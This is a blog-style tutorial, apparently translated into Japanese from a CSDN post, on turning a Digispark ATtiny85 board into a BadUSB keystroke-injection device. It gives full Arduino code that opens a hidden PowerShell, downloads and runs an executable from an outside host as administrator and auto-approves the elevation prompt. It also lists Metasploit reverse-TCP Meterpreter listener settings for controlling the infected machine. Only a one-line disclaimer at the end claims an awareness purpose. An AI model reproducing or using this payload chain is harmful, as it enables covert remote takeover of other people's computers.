Badusb の作成と使用 (侵入ウィンドウ)

目次

1.Dpinstドライバーをインストールする

2.オートメータの設定

3. Babusb を挿入して Windows システムのリモート侵入を実現します。


「BadUSB」はコンピュータ セキュリティの分野でホットなトピックの 1 つであり、この脆弱性は Karsten Nohl 氏と Jakob Lell 氏によって発見され、BlackHat セキュリティ カンファレンスで発表されました。

BadUSB で最も恐ろしいのは、USB メモリのファームウェアに悪意のあるコードが存在することであり、PC のウイルス対策ソフトは USB メモリのファームウェアが保存されている領域にアクセスできないため、USB メモリのファームウェアが保存されていないことになります。ウイルス対策ソフトウェアや USB フラッシュ ドライブのフォーマットでは、BadUSB 攻撃に対処できません

BadUSBの原則:

BadUSB が登場する前は、HID (ヒューマン インターフェイス デバイス。キーボードやマウスなど、人間と直接対話するデバイス) を使用した 2 種類の攻撃がありました。それぞれ「USBラバーダッキー」と「ティーンジー」。

USBラバーダッキーとは何ですか?

USB ラバー ダックと略称されるこれは、組み込み開発ボードを通じて実装された最も初期のキー インジェクション ツールであり、後に完全に成熟した商用キー インジェクション攻撃プラットフォームに開発されました。その原理も、USB デバイスをキーボードとしてシミュレートし、コンピュータにキーボードとして認識させ、スクリプトを実行してキーストロークをシミュレートして攻撃することです。

ティーンジーとは何ですか?

攻撃者が攻撃デバイスをカスタマイズする際には、USB デバイスに攻撃チップを組み込むことになりますが、この攻撃チップは非常に小型でフル機能のシングルチップ開発システムであり、その名前は TEENSY です。TENSY を介して、キーボードとマウスをシミュレートできます。このカスタマイズされた USB デバイスを接続すると、コンピュータはそれをキーボードとして認識します。デバイス内のマイクロプロセッサと記憶領域、およびプログラムされた攻撃コードを使用して、それをホストを完全に制御するための制御コマンドは、自動再生がオンになっているかどうかに関係なく成功します。

Digispark USB 開発ボードは、ATTiny85 マイクロコントローラーをベースとした開発ボードです。

BadUSB はUSB の深刻な脆弱性です。攻撃者はこの欠陥を悪用して、検出されずに悪意のあるコードを実行する可能性があります。

必要なツール: DPinst (badusb ドライバー)、Automator (スクリプト コード生成ツール)、arduino (スクリプト コード書き込みツール)、notepad (コード編集ツール)、

URL: https://nixu-corp.github.io/ (コード変換 URL)、https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads (スクリプト コード URL)

リンク: https://pan.baidu.com/s/1j11XNhpVM9K_C6AVoG_Qsg パスワード: 6k3l

1.Dpinstドライバーをインストールする

1.ドライバーをインストールする

64 ビット オペレーティング システムのインストールには DPinst64 を選択し、32 ビット オペレーティング システムのインストールには DPinst を選択して、Digistump フォルダー DPinst64.exe を開きます。

次のステップ - インストール (「Digistump LLC」のソフトウェアを常に信頼するにチェックを入れます)

 

2.オートメータの設定

1. Didispark-attint85 開発ボードをインストールします。Arduino には付属していないため、開発ボード マネージャーからダウンロードする必要があります。

ファイル設定

 

2. 追加の開発バージョン管理 URL: http://digistump.com/package_digistump_index.json

3. 「ツール」→「開発ボード」→「開発ボード管理」の順にクリックします。

4. Digistump で Digistump AVR Boards を見つけたら、「インストール」を選択します (注: 開発ボード管理 Web サイトは海外の Web サイトであるため、開発ボードをインストールするときにプロキシ、つまりラダーを開く必要があります) 

 

5. digispark 開発ボードがインストールされたら、[ツール]-[開発ボード]-[Digispark(デフォルト-16.5mhz)] をクリックします。 

6. プログラマを次のように設定します: USBtinyISP

クリック: [ツール] - [プログラマ] - [USBtinyISP]

 

 7. ファイル-例-DigisparkKeybosrd-キーボード

 8. 入力コードがコンパイルされたら、アップロードを選択し、60 秒以内に BadUSB 開発ボードを挿入します。

9. アップロードが成功したこと、つまりコードが BadUSB 開発バージョンに正常に書き込まれたことを示すメッセージが表示されます。 

10. Automator を使用して、キーボードとマウスのイベント コードを記述します。Badusb を挿入すると電卓が自動的にオンになることを簡単に示します。

11. Automator によって生成されたコードを Arduino にコピーし、アップロード ボタンをクリックして 60 秒以内に badUSB ディスクを挿入します (書き込みが完了するまで数秒待ってから、BadUSB ディスクを取り出します)。

12. 書き込みが成功すると、「ありがとうございます」というメッセージが表示されます。

コード補完を記述する badUSB ディスクのデモを挿入します。 

1、

2、

3、

3. Babusb を挿入して Windows システムのリモート侵入を実現します。

Powershell は、トロイの木馬プログラム コードをリモートでダウンロードし、自動的に実行します。

#include "DigiKeyboard.h"

void setup() {

  pinMode(1, OUTPUT);//可用可不用

  DigiKeyboard.sendKeyStroke(0);//初始化

  delay(3000);//延时

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//WIN+R

  delay(500);

  DigiKeyboard.sendKeyStroke(0);

  //delay(500);

  //DigiKeyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2");

  delay(500);

  DigiKeyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH POWERSHELL.EXE \'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://BADUSB.PW/1.EXE -oUTfILE C:\\X.EXE;C:\\X.EXE\' -vERB RUNAS\"");//尽量其他盘 更改HTTP://BADUSB.PW/1.EXE为你程序的下载直连

  DigiKeyboard.println();

  delay(4500);

  DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT); //ALT+Y键 用于需要按管理员确定

}



void loop() {

  //这里只是让灯亮

  digitalWrite(1, HIGH);

  delay(100);               // wait for a second

  digitalWrite(1, LOW);

  delay(500);

  digitalWrite(1, HIGH);

  delay(100);               // wait for a second


}

1. [アップロード] をクリックし、60 秒以内に Badusb ディスクを挿入し、書き込みが成功するまで数秒待ちます。

2. 書き込みが成功すると、「ありがとうございます」というメッセージが表示されます

 

 3.MSF制御端末の準備

Kali システムを開きます - ターミナルを開きます

msfを開いてペイロードを設定し、攻撃モジュールをロードしてローカルIPとリスニングポートを設定します

msfconsole

エクスプロイト/マルチ/ハンドラーを使用する

ペイロードの設定 windows/meterpreter/reverse_tcp

LHOST 192.168.245.140 を設定

LPORT 4444 を設定する

show options (IP ポート設定の表示)

run(監視開始)

4. Budusb がターゲット マシンに挿入され、トロイの木馬が自動的にダウンロードされて実行されます - リバウンド シェル - ターゲット マシンを制御します 

ビデオデモ : 1655646347015765-CSDN ライブ

このテキストは、情報セキュリティ予防および情報セキュリティ意識の啓発のみに使用し、それ以外の目的には使用せず、大切に保管してください。 

おすすめ

転載: blog.csdn.net/QQ670663/article/details/125362082